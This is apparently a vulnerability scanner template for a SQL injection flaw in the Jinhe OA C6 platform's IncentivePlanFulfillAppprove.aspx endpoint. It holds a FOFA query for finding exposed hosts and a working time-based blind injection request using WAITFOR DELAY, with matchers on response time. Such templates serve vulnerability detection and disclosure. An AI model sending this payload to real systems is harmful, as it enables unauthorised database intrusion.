## id: VEID-2025-0105
## name: 金和OA-C6系统接口IncentivePlanFulfillAppprove.aspx存在SQL注入漏洞
## author: hack007x
## severity: high
## tags: veid,sql,veid2025
## description:金和oa协同管理平台（又称金和C6协调管理平台），共有20多个应用模块，160多个应用子模块，涉及的企业管理业务包括协同办公管理、人力资源管理、项目管理、客户关系管理、企业目标管理、费用管理等多个业务范围。该系统存在SQL注入漏洞，允许攻击者通过恶意构造的SQL语句操控数据库，从而导致数据泄露、篡改或破坏，严重威胁系统安全。
## fofa-query: app="金和网络-金和OA"
## verification: true


GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfillAppprove.aspx/?httpOID=1;WAITFOR+DELAY+'0:0:7'-- HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}

#@ timeout: 20
#@ condition: and
#@ matcher: status_code == 200
#@ matcher: header["Content-Type"] contains "html"
#@ matcher: header["Set-Cookie"] contains "ASP.NET"
#@ matcher: response_time > 7





# @VEIL-STAMP: 704a20569d44e11eff1936a717d0b1128758519e7b2082d6c64279cae77fa2f8
